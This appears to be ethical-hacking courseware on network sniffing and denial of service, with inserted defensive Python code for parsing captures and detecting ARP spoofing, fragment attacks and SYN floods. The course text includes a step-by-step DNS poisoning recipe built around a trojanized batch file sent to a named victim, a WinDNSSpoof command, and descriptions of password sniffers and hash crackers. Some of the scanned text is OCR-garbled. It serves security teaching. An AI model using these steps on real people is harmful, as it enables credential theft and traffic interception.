© Webspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real time (as the target surfs, your browser surfs along with them, automatically). Netscape must be running on your local X display ahead of time

webspy [-i interface] host
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Webmitm

© Webmitm transparently proxies and sniffs HTTP/HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions

webmitm [-d]
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DNS Poisoning

To redirect all the DNS request traffic going from the host machine to come to you:

1. Set up a fake website on your computer.
2. Install Treewalk and modify the file mentioned in the readme.txt to your IP address. Treewalk will make you the DNS server.
3. Modify the file dns-spoofing.bat and replace the IP address with your IP address.
4. Trojanize the dns-spoofing.bat file and send it to Jessica (ex: chess.exe).
5. When the host clicks the trojaned file, it will replace Jessica's DNS entry in her TCP/IP properties with that of your machine.
6. You will become the DNS server for Jessica and her DNS requests will go through you.
7. When Jessica connects to XSECURITY.com she resolves to the fake XSECURITY website; you sniff the password and send her to the real website.
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Interactive TCP Relay

© It operates as a simple TCP tunnel listening on a specific port and forwarding all traffic to the remote host and port

© The program can intercept and edit the traffic passing through it

© The traffic can be edited with the built-in HEX editor

[Screenshot: Interactive TCP Relay (ITR1) window with Outgoing and Incoming panes, Send and Inject buttons, "Intercept" and "Don't show messages" checkboxes, Server (1.1.1.1), Client and This PC fields, Encoding set to ANSI, and a Save log option; the status line reads "Change Encoding Error: Can't open encoding file".]
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Interactive Replay Attacks

[Diagram: only the label "ATTACKER" is legible.]
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HTTP Sniffer: EffeTech

© An HTTP protocol packet sniffer and network analyzer

© Captures IP packets containing the HTTP protocol

© Enables on-the-fly content viewing while monitoring and analyzing

© Parses and decodes the HTTP protocol, and generates a web traffic report for reference
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HTTP Sniffer: EffeTech

[Screenshot: EtherDetect (EffeTech HTTP Sniffer) window (File, View, Sniffer, Help) showing a captured request and its response; status bar: Buffer 3%, URLs 95, Packets 393.]
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HTTP Request Header

    GET /images/logo_itini.gif HTTP/1.1
    Accept: */*
    Referer: http://www.effetech.com/
    Accept-Language: zh-cn
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: www.etherdetect.com
    Connection: Keep-Alive

HTTP Response Header

    HTTP/1.1 200 OK
    Date: Sat, 07 Jun 2003 13:32:07 GMT
    Server: Apache/1.3.27
    Last-Modified: Mon, 14 Apr 2003 14:11:33 GMT
    ETag: "]odae-4c1-3e9ac195"
    Accept-Ranges: bytes
    Content-Length: 1217
    Keep-Alive: timeout=5, max=100
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Password Sniffer

© Can monitor and capture passwords through FTP, POP3, HTTP, SMTP, Telnet, and some web mail passwords

© Can listen on a LAN and capture passwords of any network user

© Ace Password Sniffer works passively and is very hard to detect

© If a network is connected through a switch, the sniffer can be run on the gateway or proxy server, which can see all network traffic
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Password Sniffer 
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© Captures MSN chat on network 

© 1 1 records M SN conversati ons automati cal ly 

©AIM ntercepted messages can be saved as H TM L f i I es f or 
later processing and analyzing 

© Everythi ng wi 1 1 be recorded without bei ng detected 




Capturi ng M essages 





Sniffer 
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MSN Sniffer

[Screenshot: MSN Sniffer with a Start / Stop / Save / Config / Register / About / Exit toolbar, a list of captured MSN Messenger conversations (IP, port, user e-mail, message count) between the hosts BILLGATES (192.168.1.8) and HARRY (192.168.1.3), and the messages of the selected conversation, timestamped 2004-5-9; the status bar shows 150 KB buffer usage, 9 conversations, "Capturing".]
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Session Capture Sniffer: NWreader

© NetWitness audits and monitors all traffic on a network

© Interprets the activities into a format that network engineers and non-engineers alike can quickly understand

© Records all activities, and transforms the "take" into a dense transactional model describing the network, application, and content levels of those activities
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Session Capture Sniffer: NWreader

[Screenshot: NetWitness Reader with the "demo" collection open, showing the navigation tree (Action, Address, Alert, Alias, Content, Port, Properties, Protocol, Resource, Service, Size, Time, User), a session list with Time / Service / Size / Events columns and paging controls, Details / Text / Strings / Hex / Packets views for the two sides of a session, and the caption "NetWitness audits and monitors all traffic on a network".]
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Cain and Abel

© MSCACHE hashes dumper

© MSCACHE hashes dictionary and brute-force crackers

© Sniffer filter for SIP-MD5 authentications

© SIP-MD5 hashes dictionary and brute-force crackers

© Off-line capture file processing compatible with winpcap, tcpdump, and ethereal formats

© Cain's sniffer can extract audio conversations based on the SIP/RTP protocols and save them into WAV files
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Cain and Abel

[Screenshot: Cain v2.5 beta28 by mao, Protected Storage tab (alongside LSA Secrets, Network, Sniffer, Cracker and Traceroute), listing cached credentials by Resource / Username / Password / Type: an Outlook Express POP3 account for mail.eccouncil.org and an Internet Explorer form autocomplete entry for a webmail site (credentials visible in the original).]
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Packet Crafter

Craft Custom TCP/IP Packets

[Screenshot: Komodia's Packet Crafter (www.komodia.com) with fields for source IP (1.1.1.1) and port, destination IP and port, header size (20 bytes), identification, checksum (default), type of service (Routine), fragmentation flags (May frag), offset, TTL (255), data size and data, buttons to send IP, ICMP, UDP or TCP packets, and a TCP parameters panel with URG / ACK / PSH / RST / SYN / FIN flags, sequence, acknowledge, window, urgent offset and TCP checksum.]
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SMAC

[Screenshot: SMAC 1.1 (WBEM On) listing an active NDIS 5.0 adapter (ID 0000, not spoofed) with its IP address and active MAC 00-C1-26-0F-B2-72, a "New Spoofed MAC Address" entry field, Update MAC / Remove MAC / Refresh / Exit buttons, the "Show Only Active Network Adapters" option, and the KLC Consulting, Inc. banner (www.klcconsulting.net/smac).]

SMAC is a MAC Address Modifying Utility (spoofer) for Windows 2000, XP, and Server 2003 systems. It displays network information of available network adapters on one screen. The built-in logging capability allows it to track MAC address modification activities.
Raw Sniffing Tools

© Sniffit
© Aldebaran
© Hunt
© NGSSniff
© Ntop
© pf
© IPTraf
© Etherape
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Raw Sniffing Tools (continued)

© Snort
© Windump/tcpdump
© Etherpeek
© Mac Changer
© Iris
© NetIntercept
© WinDNSSpoof
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Features of Raw Sniffing Tools

© Data can be intercepted "off the wire" from a live network connection, or read from a captured file

© Can read capture files from tcpdump

© Command-line switches to the editcap program enable the editing or conversion of the capture files

© A display filter enables the refinement of the data
Sniffit

© Sniffit is a packet sniffer for TCP/UDP/ICMP packets

© It provides detailed technical information about the packets and packet contents in different formats

© By default it can handle Ethernet and PPP devices, but can be easily forced into using other devices
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Aldebaran

© Aldebaran is an advanced LINUX sniffer/network analyzer

© It supports sending data to another host, dump file encryption, real-time mode, packet content scanning, network statistics in HTML, capture rules, colored output, and more
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Hunt

© Hunt is used to watch TCP connections, intrude on them, or reset them

© It is meant to be used on Ethernet, and has active mechanisms to sniff switched connections

© Features:

• It can be used for watching, spoofing, detecting, hijacking, and resetting connections

• MAC discovery daemon for collecting MAC addresses, sniff daemon for logging TCP traffic with the ability to search for a particular string
NGSSniff

© NGSSniff is a network packet capture and analysis program

© Packet capture is done via Windows sockets raw IP or via Microsoft network monitor drivers

© It can carry out packet sorting and it does not require the installation of any drivers to run it

© It carries out real-time packet viewing
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Ntop

© Ntop is a network traffic probe that shows network usage

© In interactive mode, it displays the network status on the user's terminal

© In web mode, it acts as a web server, creating an HTML dump of the network status
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[Screenshot: Ntop web interface; the menu and chart text is not legible.]
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Pf

© Pf is OpenBSD's system for filtering TCP/IP traffic and performing Network Address Translation

© It is also capable of normalizing and conditioning TCP/IP traffic and providing bandwidth control and packet prioritization
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IPTraf



© IPTraf is a network monitoring utility for IP networks. It intercepts packets on the network and gives out various pieces of information about the current IP traffic over it

© IPTraf can be used to monitor the load on an IP network, the most used types of network services, the proceedings of TCP connections, and others
[Screenshot: IPTraf main menu: IP traffic monitor, General interface statistics, Detailed interface statistics, Statistical breakdowns, LAN station monitor, Filters, Configure. Status line: "Displays current IP traffic information"]
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Etherape 



© Etherape is a graphical network monitor for Unix

© Featuring link layer, IP, and TCP modes, it displays network activity graphically

© It can filter traffic to be shown, and can read traffic from a file as well as live from the network
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Features 



© Network traffic is displayed graphically. The more talkative a node is, the bigger its representation.

© User may select what level of the protocol stack to concentrate on.

© User may either look at traffic within a network, end to end IP, or even port to port TCP.

© Data can be captured "off the wire" from a live network connection, or read from a tcpdump capture file.

© Data display can be refined using a network filter.
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Netfilter 



© Netfilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT), and other packet mangling

© Netfilter is a set of hooks inside the Linux 2.4.x kernel's network stack which allows kernel modules to register callback functions called every time a network packet traverses one of those hooks
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Features 



© Stateful packet filtering (connection tracking)

© All kinds of network address translation

© Flexible and extensible infrastructure
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Network Probe 



© This network monitor and protocol analyzer gives the user an instant picture of the traffic situation on the target network

© All traffic is monitored in real time

© All the information can be sorted, searched, and filtered by protocols, hosts, conversations, and network interfaces
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MaaTec Network Analyzer



MaaTec Network Analyzer is a tool that is used for capturing, saving, and analyzing network traffic

Features:

• Real time network traffic statistics

• Scheduled network traffic reports

• Online view of incoming packets

• Multiple data color options
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Snort

© There are three main modes in which Snort can be configured: sniffer, packet logger, and network intrusion detection system

© Sniffer mode simply reads the packets off of the network and displays them for you in a continuous stream on the console

© Packet logger mode logs the packets to the disk

© Network intrusion detection mode is the most complex and configurable configuration, allowing Snort to analyze network traffic for matches against a user defined rule set
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Tool: Windump 



© WinDump is the port of tcpdump, the most used network sniffer/analyzer for UNIX, to the Windows platform



C:\WINNT\System32\cmd.exe - windump -n -S -vv

C:\>windump -n -S -vv

windump: listening on \Device\NPF_{F036flBE8-53D7-4C7B-B2E4-082BEF4D72D8}
19:56:53.427131 IP (tos 0x88, ttl 106, id 58655, len 108) 68.193.110.230.5000 > 192.168.2.162.5000: udp 80
19:56:53.493683 IP (tos 0x88, ttl 106, id 58656, len 108) 68.193.110.230.5000 > 192.168.2.162.5000: udp 80
19:56:53.506094 IP (tos 0x88, ttl 43, id 46880, len 40) 64.4.26.250.80 > 192.168.2.69.2446: . [tcp sum ok] 894239202:894239202(0) ack 4229117801 win 17520
19:56:53.506528 IP (tos 0x88, ttl 43, id 46881, len 510) 64.4.26.250.80 > 192.168.2.69.2446: P 894239202:894239672(470) ack 4229117801 win 17520
19:56:53.508241 IP (tos 0x88, ttl 43, id 46882, len 576) 64.4.26.250.80 > 192.168.2.69.2446: . 894239672:894240208(536) ack 4229117801 win 17520
19:56:53.508465 IP (tos 0x0, ttl 128, id 19205, len 40) 192.168.2.69.2446 > 64.4.26.250.80: . [tcp sum ok] 4229117801:4229117801(0) ack 894240208 win 16514 (DF)
19:56:53.508602 IP (tos 0x88, ttl 43, id 46883, len 106) 64.4.26.250.80 > 192.168.2.69.2446: . 894240208:894240274(66) ack 4229117801 win 17520
19:56:53.527161 IP (tos 0x88, ttl 107, id 30218, len 1500) 68.58.11.235.2824 > 192.168.2.69.2443: . 47592813:47594273(1460) ack 4228398193 win 8359 (DF)
19:56:53.538245 IP (tos 0x88, ttl 106, id 58657, len 108) 68.193.110.230.5000 > 192.168.2.162.5000: udp 80
19:56:53.580115 IP (tos 0x88, ttl 243, id 39962, len 40) 202.87.41.115.80 > 192.168.2.129.2549: F [tcp sum ok] 3461109112:3461109112(0) ack 6724698 win 8760 (DF)
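A parser for the WinDump/tcpdump `-n -S -vv` line format shown above, added here as an example and not part of the original courseware: it extracts the IP header fields, addresses and TCP flags, totals bytes per source, and lists the flows on well-known cleartext service ports, which is exactly the traffic a sniffer on the segment reads. The sample lines are constructed in documentation address ranges.

```python
import re
from collections import defaultdict

# Constructed sample in the format WinDump/tcpdump print with -n -S -vv
# (numeric addresses, absolute sequence numbers). Made up for this example
# using RFC 5737 documentation addresses; not taken from a real capture.
SAMPLE = """\
19:56:53.427131 IP (tos 0x88, ttl 106, id 58655, len 108) 198.51.100.7.5000 > 192.0.2.162.5000: udp 80
19:56:53.506528 IP (tos 0x88, ttl 43, id 46881, len 510) 203.0.113.9.80 > 192.0.2.69.2446: P 894239202:894239672(470) ack 4229117801 win 17520
19:56:53.508465 IP (tos 0x0, ttl 128, id 19205, len 40) 192.0.2.69.2446 > 203.0.113.9.80: . [tcp sum ok] 4229117801:4229117801(0) ack 894240208 win 16514 (DF)
19:56:53.580115 IP (tos 0x88, ttl 243, id 39962, len 40) 203.0.113.9.80 > 192.0.2.129.2549: F [tcp sum ok] 3461109112:3461109112(0) ack 6724698 win 8760 (DF)
"""

# Services that carry credentials and content in the clear (FTP, Telnet, SMTP,
# HTTP, POP3, IMAP); a sniffer on a shared segment reads these directly.
CLEARTEXT_PORTS = {21, 23, 25, 80, 110, 143}

LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP "
    r"\(tos (?P<tos>0x[0-9a-fA-F]+), ttl (?P<ttl>\d+), id (?P<id>\d+), len (?P<len>\d+)\) "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): "
    r"(?P<rest>.*)$"
)
SEGMENT_RE = re.compile(r"\d+:\d+\((\d+)\)")  # seq:seq(payload bytes)


def parse_line(line):
    """Parse one -n -S -vv line into a dict, or return None for a line in another format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    for key in ("ttl", "id", "len", "sport", "dport"):
        rec[key] = int(rec[key])
    rec["tos"] = int(rec["tos"], 16)
    rest = rec.pop("rest")
    rec["df"] = rest.endswith("(DF)")
    if rest.startswith("udp "):
        rec["proto"] = "udp"
        rec["flags"] = ""
        rec["payload"] = int(rest.split()[1])
    else:
        rec["proto"] = "tcp"
        # The first token is the TCP flag field: '.' means no flag of interest,
        # otherwise letters such as S, P, F, R (possibly combined, e.g. 'FP').
        first = rest.split()[0]
        rec["flags"] = "" if first == "." else first
        seg = SEGMENT_RE.search(rest)
        rec["payload"] = int(seg.group(1)) if seg else 0
    return rec


def parse_capture(text):
    return [r for r in (parse_line(line) for line in text.splitlines()) if r]


def bytes_by_source(records):
    """Total IP bytes sent per source address (the 'len' field includes the IP header)."""
    totals = defaultdict(int)
    for r in records:
        totals[r["src"]] += r["len"]
    return dict(totals)


def cleartext_flows(records):
    """(client, server, service port) triples for traffic on cleartext service ports."""
    flows = set()
    for r in records:
        if r["dport"] in CLEARTEXT_PORTS:
            flows.add((r["src"], r["dst"], r["dport"]))
        elif r["sport"] in CLEARTEXT_PORTS:
            flows.add((r["dst"], r["src"], r["sport"]))
    return flows


if __name__ == "__main__":
    recs = parse_capture(SAMPLE)
    print(bytes_by_source(recs))
    for client, server, port in sorted(cleartext_flows(recs)):
        print(f"cleartext: {client} -> {server}:{port}")
```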
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Tool: Etherpeek 




Ethernet network traffic and protocol analyzer. By monitoring, filtering, decoding and displaying packet data, it finds protocol errors and detects network problems such as unauthorized nodes, misconfigured routers, and unreachable devices.



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MAC Changer



© MAC Changer is a Linux utility for setting a specific MAC address for a network interface

© It enables the user to set the MAC address randomly. It allows specifying the MAC of another vendor or setting another MAC of the same vendor

© The user can also set a MAC of the same kind (such as a wireless card)

© It offers a choice of vendor MAC list of more than 6200 items
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IRIS v3.1


















It allows reconstruction of network traffic in a format that is simple to use and understand. It can show the web page of any employee who is watching it during work hours.



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NetIntercept






A sniffing tool that studies external break-in attempts, watches for misuse of confidential data, displays the contents of an unencrypted remote login or web session, categorizes or sorts traffic by dozens of attributes, and searches traffic by criteria such as email headers, websites, and filenames.
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WinDNSSpoof 






© This tool is a simple DNS ID Spoofer for Windows 9X/2K

© In order to use it you must be able to sniff traffic of the computer being attacked

© Usage: wds -h

Example: wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b
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Scenario 






Sam found out that he was working in a shared Ethernet network segment, which meant a sniffer could be launched from any machine in the LAN. Sam ran a sniffer and at the end of the day he studied the captured data. He could not believe it!!!

1. He was able to read actual emails.

2. He had access to passwords off the wire in clear text.

3. He could read files.

4. He had financial transaction and credit card information.

Sam decides to share the information with Dave the next day. How do you think Dave will react to this? Was Sam guilty of espionage?
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Countermeasures



© Restriction of physical access to network media ensures that a packet sniffer cannot be installed

© The best way to be secured against sniffing is to use encryption. It won't prevent a sniffer from functioning but will ensure that what a sniffer reads is not important.

© ARP spoofing is used to sniff a switched network, so an attacker will try to ARP spoof the gateway. This can be prevented by permanently adding the MAC address of the gateway to the ARP cache.
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Countermeasures (continued)



© Another way to prevent the network from being sniffed is to change the network to SSH

© There are various methods to detect a sniffer in a network:

• Ping method

• ARP method

• Latency method

• Using IDS
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Countermeasures (continued)



© There are various tools to detect a sniffer in a 
network: 

• ARP Watch 

• Promiscan 

• Antisniff 

• Prodetect 
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Countermeasures (continued)



© Small Network

• Use of static IP addresses and static ARP tables which prevents hackers from adding spoofed ARP entries for machines in the network

© Large Networks

• Network switch Port Security features should be enabled

• Use of Arpwatch to monitor Ethernet activity
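An Arpwatch-style passive monitor, added here as an example rather than taken from the courseware or from Arpwatch itself: it tracks the IP-to-MAC bindings seen in ARP replies, raises the alerts the countermeasures above rely on (a gateway whose MAC changes, one MAC answering for several IPs, a binding that flips back and forth), and prints the static `arp -s` entries for the hosts that must never change. The addresses and the reply sequence are constructed.

```python
from collections import defaultdict, namedtuple

ArpReply = namedtuple("ArpReply", "t ip mac")  # t: seconds since capture start

# Constructed sequence of ARP replies as a passive monitor on the segment would
# see them (RFC 5737 / RFC 7042 documentation addresses, made up for this
# example). 192.0.2.1 is the gateway; ...:bb is a rogue station.
SAMPLE_REPLIES = [
    ArpReply(0,  "192.0.2.1",  "00:00:5e:00:53:01"),
    ArpReply(1,  "192.0.2.10", "00:00:5e:00:53:0a"),
    ArpReply(2,  "192.0.2.11", "00:00:5e:00:53:0b"),
    ArpReply(30, "192.0.2.1",  "00:00:5e:00:53:bb"),  # the gateway's MAC suddenly changes
    ArpReply(31, "192.0.2.10", "00:00:5e:00:53:bb"),  # the same MAC now also answers for .10
    ArpReply(60, "192.0.2.1",  "00:00:5e:00:53:01"),  # flips back when the real gateway answers
]

# Known-good bindings an administrator would pin with static ARP entries (constructed).
PROTECTED = {"192.0.2.1": "00:00:5e:00:53:01"}


class ArpMonitor:
    def __init__(self, protected=None):
        self.table = {}                    # ip -> MAC currently bound to it
        self.history = defaultdict(set)    # ip -> every MAC ever seen for it
        self.protected = {ip: mac.lower() for ip, mac in (protected or {}).items()}
        self.alerts = []                   # (time, kind, subject, detail)

    def observe(self, reply):
        ip, mac = reply.ip, reply.mac.lower()
        if ip in self.protected and mac != self.protected[ip]:
            self.alerts.append((reply.t, "protected host spoofed", ip, mac))
        prev = self.table.get(ip)
        if prev is None:
            self.alerts.append((reply.t, "new station", ip, mac))
        elif prev != mac:
            # A MAC already seen for this IP means the binding oscillates between the
            # real owner and an impostor; a never-seen MAC is a plain change.
            kind = "flip flop" if mac in self.history[ip] else "changed ethernet address"
            self.alerts.append((reply.t, kind, ip, mac))
        self.table[ip] = mac
        self.history[ip].add(mac)
        # One MAC answering for several IPs is the footprint of a poisoning attempt.
        claimed = sorted(i for i, m in self.table.items() if m == mac)
        if len(claimed) > 1:
            self.alerts.append((reply.t, "one mac claims multiple ips", mac, tuple(claimed)))

    def static_entries(self):
        """Static cache entries pinning the protected hosts (the small-network countermeasure)."""
        return [f"arp -s {ip} {mac}" for ip, mac in sorted(self.protected.items())]


def run_monitor(replies, protected):
    mon = ArpMonitor(protected)
    for reply in sorted(replies, key=lambda r: r.t):
        mon.observe(reply)
    return mon


def alert_kinds(mon):
    return [a[1] for a in mon.alerts]


if __name__ == "__main__":
    monitor = run_monitor(SAMPLE_REPLIES, PROTECTED)
    for alert in monitor.alerts:
        print(alert)
    print("\n".join(monitor.static_entries()))
```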
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Summary 



© Sniffing allows the capture of vital information from network traffic. It can be done over the hub or the switch (passive or active)

© Passwords, emails, and files can be grabbed by means of sniffing

© ARP poisoning can be used to change the switch mode of the network to hub mode and subsequently carry out packet sniffing

© Ethereal, Dsniff, Sniffit, Aldebaran, Hunt, and NGSSniff are some of the most popular sniffing tools

© The best way to be secured against sniffing is to use encryption and apply the latest patches or other lockdown techniques to the system
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Ethical Hacking 



Module VIII
Denial Of Service 



Scenario 






Sam heads a media group whose newspaper contributes a major chunk to the company's revenue. Within three years of its launch it surpassed most of the leading newspapers in its areas of distribution. Sam proposes to extend his reach by coming up with an online e-business paper and announces the launch date.

John, an ex-colleague of Sam's, and head of a rival media group, watches Sam's every move. John makes plans to foil the launch of Sam's e-business newspaper.

1. How could John cause visible damage and hurt the company's reputation and goodwill?

2. What would be a good mode of attack that John can adopt so that it cannot be traced back to him?

3. Is there a way Sam can avoid a denial of service attack in case John is planning one against the group?

4. Do you think that executing a denial of service is possible? Can you list any cases where a denial of service has caused considerable damage?
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Module Objective 



© What is a Denial of Service Attack? 

© Types of DoS Attacks 

© DoS Tools 

© DDoS Attacks

© DDoS Attack Taxonomy

© DDoS Tools

© Reflected DoS Attack

© Taxonomy of DDoS Countermeasures

© Worms and Viruses 
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Module Flow 



DoS Attacks: Characteristics ► Goal and Impacts of DoS ► Hacking Tools for DoS ► DDoS Countermeasures and Defensive Tools ► Reflected DoS
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© A single attacker, Mafiaboy, shot down some of the biggest e-commerce websites: eBay, Schwab, and Amazon. Mafiaboy, a Canadian teenager who pleaded guilty, used readily available DoS attack tools, which can be used to remotely activate hundreds of compromised zombie servers to overwhelm a target's network capacity in a matter of minutes.

© In the same attack, CNN Interactive found itself essentially unable to update its stories for two hours—a potentially devastating problem for a news organization that prides itself on its timeliness.
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CNN.com, April 19, 2000: 'Mafiaboy' faces up to 3 years in prison

[Screenshot of the CNN.com article by D. Ian Hopper, CNN Interactive Technology Editor; web posted at 5:33 p.m. EDT (2133 GMT)]

(CNN) -- Under Canadian law, "Mafiaboy" faces a maximum of three years in jail if convicted in February's denial of service attacks.

The Royal Canadian Mounted Police and the U.S. Federal Bureau of Investigation announced Wednesday that a 15-year-old boy who lives in the Montreal area was charged Monday with two counts of "mischief to data" in connection with the denial of service attack on CNN.com in February.
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Denial of Service Attacks on the Rise?



© August 15, 2003

• Microsoft.com falls to a DoS attack. The company's website is inaccessible for two hours.

© March 27, 2003, 15:09 GMT

• Within hours of an English version of Al Jazeera's website coming online, it was blown away by a denial of service attack.
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What are Denial of Service Attacks?




© A denial of service attack (DoS) is an attack through which a person can render a system unusable, or significantly slow it down for legitimate users, by overloading its resources.

© If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.
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Goal of DoS 



© The goal of DoS is not to gain unauthorized access to machines or data, but to prevent legitimate users of a service from using it.

© Attackers may:

• Attempt to flood a network, thereby preventing legitimate network traffic

• Attempt to disrupt connections between two machines, thereby preventing access to a service

• Attempt to prevent a particular individual from accessing a service

• Attempt to disrupt service to a specific system or person
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Impact and the Modes of Attack
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© The Impact:

• Disabled network 

• Disabled organization 

• Financial loss 

• Loss of goodwill 

© The Modes: 

• Consumption of

- Scarce, limited, or non-renewable resources

- Network bandwidth, memory, disk space, CPU time, or data structures

- Access to other computers and networks, and certain environmental resources such as power, cool air, or even water

• Destruction or alteration of configuration information

• Physical destruction or alteration of network components, resources such as power, cool air, or even water
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Types of Attacks 



There are two types of attacks:

1. DoS attack

2. DDoS attack

• A type of attack on a network that is designed to bring the network down by flooding it with data packets






DoS Attack Classification 



© Smurf 

© Buffer Overflow Attack 
© Ping of death 
© Teardrop 
© SYN 

© Tribal Flood Attack 
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Smurf Attack 






© The perpetrator generates a large amount of ICMP echo (ping) traffic to a network broadcast address with a spoofed source IP set to a victim host

© The result will be lots of ping replies (ICMP Echo Reply) flooding the spoofed host

© Amplified ping reply stream can overwhelm the victim's network connection

© The smurf attack's cousin is called fraggle, which uses UDP echo
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Smurf Attack

[Diagram: the Attacker (A) sends an ICMP Echo Request with source C (the Target) and destination subnet B (the Receiving Network), but originating from A; every host on the Receiving Network answers with an ICMP_ECHO_REPLY, Source: Receiving Network, Destination: Target]
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Buffer Overflow Attack 



© Buffer overflow occurs any time the program writes more information into the buffer than the space it has allocated in the memory

© The attacker can overwrite data that controls the program execution path and hijack the control of the program to execute the attacker's code instead of the process code

© Sending email messages that have attachments with 256-character can cause buffer overflow
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Ping of Death Attack



© The attacker deliberately sends an IP packet larger than the 65,536 bytes allowed by the IP protocol.

© Fragmentation allows a single IP packet to be broken down into smaller segments.

© The fragments can add up to more than the allowed 65,536 bytes. The operating system, unable to handle oversized packets, freezes, reboots or simply crashes.

© The identity of the attacker sending the oversized packet can be easily spoofed.
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Teardrop Attack 



© IP requires that a packet that is too large for the next router to handle be divided into fragments.

© The attacker's IP puts a confusing offset value in the second or later fragment.

© If the receiving operating system is not able to aggregate the packets accordingly, it can crash the system.

© It is a UDP attack, which uses overlapping offset fields to bring down hosts.

© The Unnamed Attack

• Variation of the Teardrop attack

• Fragments are not overlapping but there are gaps incorporated
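A defender-side check over captured IP fragments, added here as an example and not taken from the courseware: it groups fragments by IP ID and reports the three malformed shapes the Ping of Death, Teardrop and Unnamed slides describe (an oversized reassembled datagram, overlapping offsets, and gaps between fragments), working on a complete, constructed set of fragments rather than a live reassembly queue.

```python
from collections import defaultdict, namedtuple

# One IP fragment: offset is in bytes (the header's 13-bit field times 8),
# length is the payload length, more is the More Fragments flag.
Frag = namedtuple("Frag", "ip_id offset length more")

IP_MAX_TOTAL = 65535   # largest total length the 16-bit IP length field can express
IP_HEADER_LEN = 20     # header without options, added back when judging the reassembled size


def classify_datagram(frags):
    """Return the problems found in one datagram's complete set of fragments."""
    problems = set()
    end = 0  # first payload byte not yet covered by the fragments walked so far
    for f in sorted(frags, key=lambda f: f.offset):
        if f.offset < end:
            # The fragment starts inside data an earlier fragment already covered.
            problems.add("overlapping fragments (teardrop)")
        elif f.offset > end:
            # Nothing covers the bytes between end and this offset.
            problems.add("gap between fragments (unnamed attack)")
        end = max(end, f.offset + f.length)
    if end + IP_HEADER_LEN > IP_MAX_TOTAL:
        problems.add("reassembled datagram exceeds 65,535 bytes (ping of death)")
    if not any(not f.more for f in frags):
        problems.add("no final fragment")
    return sorted(problems)


def classify_capture(frags):
    """Group a capture's fragments by IP ID and classify each datagram."""
    by_id = defaultdict(list)
    for f in frags:
        by_id[f.ip_id].append(f)
    return {ip_id: classify_datagram(group) for ip_id, group in sorted(by_id.items())}


def constructed_sample():
    """Four constructed datagrams: normal, teardrop, unnamed, and an oversized ICMP echo."""
    frags = [
        Frag(1, 0, 1480, True), Frag(1, 1480, 1480, True), Frag(1, 2960, 100, False),
        Frag(2, 0, 36, True), Frag(2, 24, 4, False),   # second fragment lands inside the first
        Frag(3, 0, 36, True), Frag(3, 48, 4, False),   # bytes 36..47 are never sent
    ]
    # 45 contiguous fragments of 1480 bytes: the last one ends at payload byte 66,600.
    frags += [Frag(4, off, 1480, off + 1480 < 66600) for off in range(0, 66600, 1480)]
    return frags


if __name__ == "__main__":
    for ip_id, problems in classify_capture(constructed_sample()).items():
        print(ip_id, problems or ["ok"])
```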
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SYN Attack 






© The attacker sends bogus TCP SYN requests to a victim server. The host allocates resources (memory sockets) to the connection.

© Prevents the server from responding to legitimate requests.

© This attack exploits the three-way handshake.

© Malicious flooding by large volumes of TCP SYN packets to the victim system with spoofed source IP addresses can cause DoS.
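Half-open connection accounting for spotting a SYN flood, added here as an example and not from the courseware: it replays client-side TCP segments, keeps every SYN that is never followed by the client's ACK or a RST as half-open, and alerts on a service whose backlog of aged half-open entries reaches a threshold, which is the resource exhaustion the slide describes. The packet trace and addresses are constructed.

```python
from collections import defaultdict, namedtuple

# Client-to-server TCP segments only: flag is 'S' (SYN), 'A' (the ACK that
# completes the handshake) or 'R' (RST). t is seconds since capture start.
Pkt = namedtuple("Pkt", "t src sport dst dport flag")


def constructed_sample():
    """Two legitimate handshakes followed by 50 SYNs from forged sources that never answer."""
    pkts = [
        Pkt(0.00, "192.0.2.10", 40001, "203.0.113.5", 80, "S"),
        Pkt(0.01, "192.0.2.10", 40001, "203.0.113.5", 80, "A"),
        Pkt(0.02, "192.0.2.11", 40002, "203.0.113.5", 22, "S"),
        Pkt(0.03, "192.0.2.11", 40002, "203.0.113.5", 22, "A"),
    ]
    for i in range(50):
        pkts.append(Pkt(1.0 + i * 0.001, f"198.51.100.{i + 1}", 50000 + i, "203.0.113.5", 80, "S"))
    return pkts


def half_open_connections(pkts, now):
    """Map (src, sport, dst, dport) -> age in seconds for every SYN not yet completed or reset."""
    pending = {}
    for p in sorted(pkts, key=lambda p: p.t):
        key = (p.src, p.sport, p.dst, p.dport)
        if p.flag == "S":
            pending.setdefault(key, p.t)       # a retransmitted SYN keeps its first timestamp
        elif p.flag in ("A", "R"):
            pending.pop(key, None)             # handshake finished or aborted: slot released
    return {key: now - t0 for key, t0 in pending.items()}


def syn_flood_alerts(pkts, now, threshold=20, min_age=0.5):
    """Services whose count of half-open entries older than min_age reaches the threshold.

    min_age keeps a burst of legitimate SYNs that complete within one round trip
    from counting; spoofed SYNs never complete, so they age past it.
    """
    per_service = defaultdict(list)
    for (src, _sport, dst, dport), age in half_open_connections(pkts, now).items():
        if age >= min_age:
            per_service[(dst, dport)].append(src)
    return {
        svc: {"half_open": len(srcs), "distinct_sources": len(set(srcs))}
        for svc, srcs in per_service.items()
        if len(srcs) >= threshold
    }


if __name__ == "__main__":
    for (dst, dport), info in syn_flood_alerts(constructed_sample(), now=5.0).items():
        print(f"SYN flood against {dst}:{dport}: {info['half_open']} half-open "
              f"from {info['distinct_sources']} sources")
```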
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Tribal Flood Attack

© An improved denial of service attack that took 
down Yahoo! and other major networks in the 
summer of 2000 

© It is a parallel form of the teardrop attack 

© A pool of "slaves" is recruited

© The systems ping in concert to provide the 
power and bandwidth of every server to 
overwhelm the victim's bandwidth, flooding its 
network with an overwhelming number of pings 



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DoS Attack Tools 



© Jolt2

© Bubonic

© Land and LaTierra 

© Targa 
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DoS Tool: Jolt2






© Allows remote attackers to cause a denial of service attack against Windows-based machines.

© Causes the target machines to consume 100% of the CPU time on processing of illegal packets.

© Not Windows specific. Cisco routers and other gateways may be vulnerable.
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Picture source: 

